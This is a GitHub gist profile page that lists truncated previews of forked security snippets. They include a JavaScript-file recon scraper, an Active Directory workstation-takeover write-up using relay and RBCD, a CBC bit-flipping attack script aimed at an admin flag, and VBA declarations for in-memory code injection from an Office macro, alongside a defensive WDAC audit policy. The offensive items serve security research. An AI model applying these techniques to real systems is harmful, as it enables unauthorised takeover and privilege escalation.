Skip to content

Instantly share code, notes, and snippets.

View TomYang9's full-sized avatar

Tom Yang TomYang9

7 followers · 24 following
  • Wellington, New Zealand
View GitHub Profile
@TomYang9
TomYang9 / javascript-file-finder.py
Created September 19, 2021 05:03 — forked from JoyGhoshs/javascript-file-finder.py
#!/bin/bash
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def js(domain):
session = requests.Session()
session.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
html = session.get(domain).content
soup = bs(html, "html.parser")
@TomYang9
TomYang9 / Workstation-Takeover.md
Created August 19, 2021 11:05 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@TomYang9
TomYang9 / servefile.sh
Created March 4, 2021 09:47 — forked from talwai/servefile.sh
One-shot HTTP webserver to serve file contents using netcat
{ echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c <some.file)\r\n\r\n"; cat some.file; } | nc -l 8080
@TomYang9
TomYang9 / Non_Microsoft_Driver_Load_Audit.xml
Created March 4, 2021 09:45 — forked from mgraeber-rc/Non_Microsoft_Driver_Load_Audit.xml
A WDAC audit-mode policy that will log all non-Windows-signed driver loads and any driver that is not WHQL or EV signed.
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:Unsigned System Integrity Policy</Option>
</Rule>
<Rule>
@TomYang9
TomYang9 / bit-flipping-attack.py
Created March 2, 2021 10:08 — forked from nil0x42/bit-flipping-attack.py
Simple, easy to understand implementation of Bit-Flipping attack on CBC mode
#!/usr/bin/python3 -u
# requirements: PyCryptodome
import base64
import subprocess
from Crypto.Util.strxor import strxor
from Crypto.Util.Padding import pad
### variables to set
PLAINTEXT = b"id=12345678;name=myname;is_admin=false;[email protected]"
@TomYang9
TomYang9 / functioninjection.vba
Created December 22, 2020 08:05 — forked from rmdavy/functioninjection.vba
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As Long, ByVal offsetinVft As Long, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As Long, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Const CC_STDCALL = 4
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private VType(0 To 63) As Integer, VPtr(0 To 63) As Long